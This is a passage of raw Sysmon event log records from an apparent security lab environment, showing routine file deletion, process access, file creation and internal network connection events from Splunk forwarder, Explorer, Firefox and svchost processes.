Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.031{C8EA50B7-1B09-6216-9907-000000003802}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.027{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A4DB5767BCA7DA0E8DC871593873E3,SHA256=6DEC5CD11058714D818E5EE21352B061762C55F0B364CD1230B6C1E91772D7D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.012{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.012{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.012{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:21.012{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.996{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:20.996{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:22.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=773A326861E814803EFDFD4B2E8CE3A7,SHA256=F03C9287D1E6F161ADE37414303ECB289CA9F386221D09B82D3C2E115B4256D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:22.177{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A10617019B70A398D6356E23150FC02,SHA256=08A33C01491DCBBD1BB8C206B129EE428697AC9EBEDAE08DEE3C4B51BA7C6F33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:22.428{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=6F81B893E54E150C82CC82EC69B0DBD0,SHA256=F90B3410452B5A89CB5B4DC41CED03E63B2F42A30486AF55C824BFFA6B6553BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:23.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56806D925E9D37B455BCDE24E252587F,SHA256=D4F6093AC8CA3BFBE47249C7FB5F55CE2713ED260CFE362558DF19A4C277DBD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:23.270{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B8A671EFC273078730AA2FBFE1798CF,SHA256=3A1A3E2836F8262323C2B16225DCA8B9C43A54AF51092F06EEFBED7C33D49DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:23.678{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\13438MD5=2F61BAAE4AE41DFBB3104AC42867C513,SHA256=7AC221805361A1F74A37948C4EB9D0C878B678BA417B513BF6FF858BF56033A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:24.796{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3131AEC8DF53943F64A7361D599176,SHA256=95D55B23482FFD574A0D84DCED0F996801F36B8C8ACA1A55C2884D8BBE921299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:24.489{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B622D0CFE7FE441D7A1A8C9105D65B36,SHA256=1F840F338E03DCBFD3CEB15E035363CD7768C8EFDEBA38F9FE229BA36E0AF08D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:25.843{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCDD62F64478F6B3ADC74FA2DB4E81B8,SHA256=09D5BDFE8F6C43E3D69084C211781EB159734E71C02EAA956D93ABFC00A9346B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:23.525{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51819-false10.0.1.12-8000- 23542300x8000000000000000223903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:25.723{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C419D2FDCA8CE95D1D9A1885CBA3D3F7,SHA256=8BFA88CA1281ADC28112E6FDD70F1DECF08C41353C1CD385CABFADDA119837EE,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000300188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:25.477{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txt2022-02-22 11:23:49.748 23542300x8000000000000000300187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:25.476{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txtMD5=BB3582A1B1F55975A00EABD58D6BA731,SHA256=AB70290F026659B5F92CE7AB152322967E2E99968E0F3E50579C7C177BCE257F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:22.719{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49699-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:26.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F7EF76C21F739B73BE1B802EF99B58,SHA256=22F6B17D3F76EC15676AF0E07A4CC6D3EDFEAF13857A57E09CAA1E6557E2F748,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:26.844{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0B841BD42EA54A089B32B83A95A37B,SHA256=A8F285D0B95BCD8983A3DEF47AEDFC730742698761C4E5DDF674E9A8EA717E6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:27.859{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93086DBC4FEAF43F41F7123A5A2BD46D,SHA256=F0883A5294237E0D289FC544CBE85A800A5DDCB5843A81BF1F08F2511E3363E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:27.397{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=1277C19F2C07C0D777946364B843322F,SHA256=CE4E85E3763A2F768783E1CD9EFE46BA85BAEF264A192EFCB5796A507309DD75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:28.880{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B67AC47650B897254D9CBDA93BAB742,SHA256=86E19FAEB4F33B66B9932B78E23D23545090F711A424DE31A51CC12032692685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:28.004{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F48B860EC5CD347FEB6F0C54F6BAC83,SHA256=5ECEF7D25392E2CED586698526D836EE2DAD38352997E91AE4D9467268A72655,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:29.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8CFCF81F224B0C72190A6F25C986018,SHA256=FA71A5AB9B9F8FE537001D3969EE33A12D119D7F9FA09EE6382FD0C46FD796D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:29.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D30AFBA4C87F2E70539D8DEEAE2CC21,SHA256=FE50D80267FBB09378CEC6F070227F1D794C607F87CF9AB7FF490CFC6268F4F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:30.911{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14286618BBC003AB456857A298E89BC4,SHA256=34ABAC004A58C4AAB62EFDE532AFCEEEEEEEE0882C695CFBDC79696D3FBE6011,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:30.535{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6702F8BD952A042419C33D8D46C4B28D,SHA256=D0F26D56056838EB5B703F9D34DE588C82C30A7AE18E3D22B64AFBD0EF6AEE52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:30.067{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E92CF409FB31D7AE51A3BE7CFB2B31AF,SHA256=0662B130AEA50337A24309A231A30637E7B7510E60F6A4CE9966AFD3F12A5D7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:31.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADDBCF8392A10AF17C6836DA18762A24,SHA256=5313E54FB1FCFF1CE5B88098DEE640B1E1C9BDAEAE1F7EE0F7BD5E8AC2942290,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:31.160{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ABDF5FE973ABE725D1C39B96E0C69AD,SHA256=922AD529CB6117FF7BA5A278D344D2261AEFF5B5115D25D74E22FB8739815191,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:28.486{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49703-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000223910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:28.635{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51820-false10.0.1.12-8000- 23542300x8000000000000000300198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:32.931{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3184B917F46578F02532802E6A7267C9,SHA256=1B8D2543189EFBA68C057854C542FFC9B4566BFFCC314FAC9E31B9F1A649BA83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:32.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEB2537B50A68B728A48D76A598ADE57,SHA256=956027AFCFB881E55B311F2751EC05D967A8763D5738870229734D1B65ABC7E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:33.962{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4137CB07F8E48922B43390C99056E399,SHA256=1BC24625BE32298F954C70732DACD7E30C88278848C96A536B22D9D47EFA888D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:33.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F71C77E7991BD33307E86E996D16CB04,SHA256=0326BFB8081C02C77857FBBDD2B751E83016BE5744CE17D014EE3E5759771196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:33.715{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1DBEFC8060916566EC1B85F17CF915CE,SHA256=77C7C113118D09AA12F983ACA4C299DAB78BE5407EAE8C9E525F2DA63B814C64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:34.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F04BF05FAB992E25D508B9395A56261,SHA256=EFFD8CE06A96F0D46568F7B47231CCF3097F4FE59C779C653204C66CF941AA71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:34.301{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23A4307CF10B5409590247F32756ADAB,SHA256=724615B6C99481BBD1B10A159B5066D1C7DEEF9116F57DFDB83FEB2A2B51A2F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:35.995{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 